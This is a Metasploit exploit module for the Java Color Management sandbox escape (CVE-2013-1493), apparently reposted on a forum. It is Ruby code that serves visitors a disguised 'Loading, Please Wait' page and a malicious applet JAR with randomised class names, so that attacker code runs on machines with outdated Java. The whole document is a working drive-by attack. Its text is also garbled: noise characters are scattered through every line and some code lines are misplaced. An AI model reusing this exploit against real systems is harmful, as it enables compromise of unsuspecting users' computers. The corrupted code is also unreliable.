##0 S, ^' k- A/ E$ a6 j3 W. x
1 N o3 E0 D$ y% P: N6 b. X6 Q3 m
# This file is part of the Metasploit Framework and may be subject to' \4 b) O2 d' _- O0 u' A; L/ H
# redistribution and commercial restrictions. Please see the Metasploit
, b" @1 Z, A. i" t3 i! t# web site for more information on licensing and terms of use.
8 c- k5 H) e# h' ]# http://metasploit.com/ k- _1 }( D8 K7 k1 @" a
##
. x6 I) g2 P; @( a# `require ‘msf/core’; y, o3 {" j& Z
require ‘rex’
/ O9 y8 w2 l8 z' d% A( rclass Metasploit3 < Msf::Exploit::Remote, L* q0 J) ], J* g2 B
Rank = NormalRanking5 }. S# k6 q, k. s* A
include Msf::Exploit::Remote::HttpServer::HTML0 {3 x, z$ m& @6 W
include Msf::Exploit::EXE
3 |" d! ]2 |& K. h: Finclude Msf::Exploit::Remote::BrowserAutopwn
, j+ B4 T: Q+ I3 @: Z3 W; ^& Zautopwn_info({ :javascript => false })" y4 a* r. w* ~6 {& t
def initialize( info = {} )8 Z4 W' N9 b Y* X9 x
super( update_info( info,
A) s7 ?1 Z2 m" L& z2 S- s‘Name’ => ‘Java CMM Remote Code Execution’,# J) t0 x/ V# i" h( z1 B* D
‘Description’ => %q{
5 w; K) U7 R b( @" L, OThis module abuses the Color Management classes from a Java Applet to run( c+ S, C9 S2 x" V$ Y! i
arbitrary Java code outside of the sandbox as exploited in the wild in February
; m0 Q, r( q1 Eand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
. \4 ]6 Y+ b5 b; b) Pand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1. }" g9 \2 @( o, j
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java0 C! Z) ^% t b) p$ u6 j3 g7 \. |- ^
warning in order to run the malicious applet.8 b+ ~. k |2 ?0 M5 H- T
},
* R( p2 F4 J" i- C2 T$ p" O8 _‘License’ => MSF_LICENSE,
5 a# n% W ^" S! S# q7 {5 E‘Author’ =>/ q3 K- R9 u0 w0 \
'Unknown', # Vulnerability discovery and Exploit, n" K: K) e& `$ N8 r. v
'juan vazquez' # Metasploit module (just ported the published exploit)
. ]. c" K/ K' V U4 D- o],
- U# a, H; ^" O3 t* N/ X‘References’ =>
Q& Q0 |5 U$ A0 N+ w[
2 `8 y& W' i5 i N- U[ 'CVE', '2013-1493' ],' z& n3 @5 `5 C7 R
[ 'OSVDB', '90737' ],
1 T9 n/ ]* l6 q6 F% w+ W[ 'BID', '58238' ],
1 [' ^2 r0 l; T( d' Z" c[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
2 V1 Y* g' I8 l( E* T' d ]1 v5 h1 [[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
( x! _$ ]5 q. p/ W6 ^[ 'URL', 'http://pastie.org/pastes/6581034' ]5 V" \" O" ^( ?" o
],
! T2 y1 P) o1 h. o6 u‘Platform’ => [ 'win', 'java' ],
3 S6 X* S; j+ |% a0 a‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },) G3 \/ X7 ~* ~+ Z
‘Targets’ =>
7 Y1 |- u( G l0 }2 R' i[8 F: J2 S6 L& b0 `" T6 b
[ 'Generic (Java Payload)',
* W4 _0 L# F- b# ^3 O& }0 ?2 r{
; z& | F7 p: O; D& C- j3 w'Platform' => 'java',
4 _5 u% n! U" ?: j1 |$ g' Z'Arch' => ARCH_JAVA
0 k) j# ], W1 C}
4 W1 t1 \" Z2 K, _$ `7 B],. F" t. z: B' s* ~% t. M
[ 'Windows x86 (Native Payload)',
" Z9 c/ E- a6 x l A{
1 ]6 n/ j. b3 d% i'Platform' => 'win',
! O& ~2 ^ w* v& A" w) U* F'Arch' => ARCH_X86+ ?% ?+ F) r0 H0 G: v
}. a/ b: s2 p$ B! G9 r
]6 w. t R) T5 A6 I2 T% P
],! p9 {- q' P0 p9 l
‘‘DisclosureDate’ => ‘Mar 01 2013′* ^( |3 I7 F" Z1 v* D
))
9 r4 j* l1 f/ f4 D+ T: ~: ^$ Cend5 S! x9 o- D( g4 E% u* \
def setup
: t1 I' t+ x- `$ B* jpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
# G+ Q& i) J( e" S& R; {& b( _@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ j0 r0 M& P4 v, e' B
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)+ e1 q' b' X) f. r/ K! L& M4 H
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 o( r. O5 @$ f3 C/ C Y, D1 }5 p8 P+ Kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
8 o5 a, o' R% o@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }5 i4 N4 C4 G( c6 |8 @7 m# o5 b. \% }( U
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)* G) _$ Z0 Q' c) ]
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
# f% |) p9 V* C3 J" s@init_class_name = rand_text_alpha(“Init”.length)4 b; Q, T' _; Y$ a
@init_class.gsub!(“Init”, @init_class_name)
* k- A3 O7 Z9 q% O( V4 c8 Usuper
/ N, K- m; Q3 r& p' U6 T7 r, M& }end: N+ G* e9 C% b- \
def on_request_uri(cli, request)% ~7 z" E+ K0 U* C. m/ k! P2 }! i
print_status(“handling request for #{request.uri}”)
! S7 K: Y! B o p* [case request.uri
9 o/ q9 o U5 S, A+ iwhen /\.jar$/i
& r# h7 F! q, {: T+ @2 yjar = payload.encoded_jar3 Y( ]7 V( M5 h: y+ e$ \
jar.add_file(“#{@init_class_name}.class”, @init_class)4 O6 b. i* B9 W0 W# Q
jar.add_file(“Leak.class”, @leak_class)5 @& f) Q8 e4 M' n6 H5 J
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)5 ~, f$ P) m$ Y" l
jar.add_file(“MyColorSpace.class”, @color_space_class)# l* n7 o5 G2 i. b8 b
DefaultTarget’ => 1,
6 F$ @: E% Z' M0 V- _0 T! C3 Nmetasploit_str = rand_text_alpha(“metasploit”.length)1 v0 O2 \/ P4 _) t/ o9 p2 S- j+ R
payload_str = rand_text_alpha(“payload”.length)5 r1 D: k) m. X) E7 h2 \
jar.entries.each { |entry| x+ w; s' K6 S* |0 c
entry.name.gsub!(“metasploit”, metasploit_str)- q+ n! A: {* Y6 U4 ~: o
entry.name.gsub!(“Payload”, payload_str)8 ~% F+ j9 c! p4 L6 y4 U
entry.data = entry.data.gsub(“metasploit”, metasploit_str)( R0 m& I: u( w& _. n$ }9 Y6 v
entry.data = entry.data.gsub(“Payload”, payload_str)
( J# O/ H+ B" p* ?+ }! \}, K; |4 } w# j# F: f
jar.build_manifest5 u' i& M4 `$ z
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
' I! y' c7 V- e, j! jwhen /\/$/1 s+ K. ~) H& b) W% v; t1 a
payload = regenerate_payload(cli)* s: M' W1 ^* Y8 M5 W' T
if not payload
' m. V- b. O* N9 iprint_error(“Failed to generate the payload.”)' x. A, D; b* l1 j
send_not_found(cli)
! _- _# j0 g8 y$ ~+ K( b' ureturn
: n# p. n! d- h3 R2 L% N! Yend! `8 E( o9 h( `: e
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
3 G3 x$ }* X& X( U+ N3 _else8 L$ J" z$ |6 I' Q' b5 t; i
send_redirect(cli, get_resource() + ‘/’, ”)0 n8 _8 ~! @! u7 L/ y
end8 p6 ]9 J9 Q1 \0 L' G! _' Q
end. X4 s+ i/ p3 Y9 _
def generate_html( [2 G5 H' C+ n0 w# u* d+ y9 k9 u8 {
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
/ D3 E! J+ b ghtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|" }3 K% S Z. u# w9 X2 X
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
7 Y! P5 B! o" b+ xhtml += %Q|</applet></body></html>|
8 }% r7 F% X# B& p$ h: d: V# ureturn html; N9 n* c A; a j" Q
end, z9 p# N) ?8 R3 p9 U
end
1 g% l" o" T( \$ Zend
( N( f2 l4 }1 Y, g0 j& z/ P |
发表于 2013-4-4 17:31:17
收藏
支持
反对